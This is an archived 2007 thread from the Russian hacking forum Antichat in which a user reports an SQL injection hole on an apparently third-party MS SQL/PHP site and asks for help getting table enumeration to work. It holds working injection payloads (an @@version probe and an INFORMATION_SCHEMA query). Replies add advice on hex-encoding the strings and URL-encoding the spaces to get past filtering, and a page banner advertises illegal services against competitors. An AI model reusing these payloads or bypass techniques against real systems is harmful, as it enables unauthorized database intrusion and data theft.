Форум АНТИЧАТ - Проблема , Ms Sql

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Проблема , Ms Sql

Опции темы

Поиск в этой теме

Опции просмотра

Проблема , Ms Sql

03.09.2007, 20:47

Isis

Флудер

Регистрация: 20.11.2006

Сообщений: 3,316

Провел на форуме:
16641028

Репутация: 2371

Проблема , Ms Sql

Нашел вообщем дыру на сайте...
Стоит MS SQL
POST запросы....

Код:

' or 1=@@version--

работает, получается экранирования кавычек нету?так?!

Пробую

Код:

' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('change_ssn_history'))--

Здесь ругается:

Код:

Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in C:\AppServ2\www\index.php on line 17

Warning: mssql_query() [function.mssql-query]: Query failed in C:\AppServ2\www\index.php on line 17

Warning: mssql_num_rows(): supplied argument is not a valid MS SQL-result resource in C:\AppServ2\www\index.php on line 18

Че за?

03.09.2007, 21:17

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

странно ( может ограничение по длине запроса ?
хотя в таком случае не должно быть "\"

03.09.2007, 21:27

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

пробуй hex

Код:

' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (0x6368616E67655F73736E5F686973746F7279)--

мож поможет?

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 03.09.2007 в 21:38..

03.09.2007, 22:15

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

там php а не asp остюда кривой вывод.

03.09.2007, 22:16

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Змен пробелы на %20 or + or %2B

если че стукни в асю буду свободен посмотрю.

Последний раз редактировалось [ cash ]; 03.09.2007 в 22:19..

06.09.2007, 19:42

Termin@L

Участник форума

Регистрация: 07.12.2006

Сообщений: 192

Провел на форуме:
492591

Репутация: 123

У меня была такая фигня, что кавычки нельзя использовать...

06.09.2007, 22:09

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

See this - http://forum.antichat.ru/showpost.php?p=453569&postcount=28

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход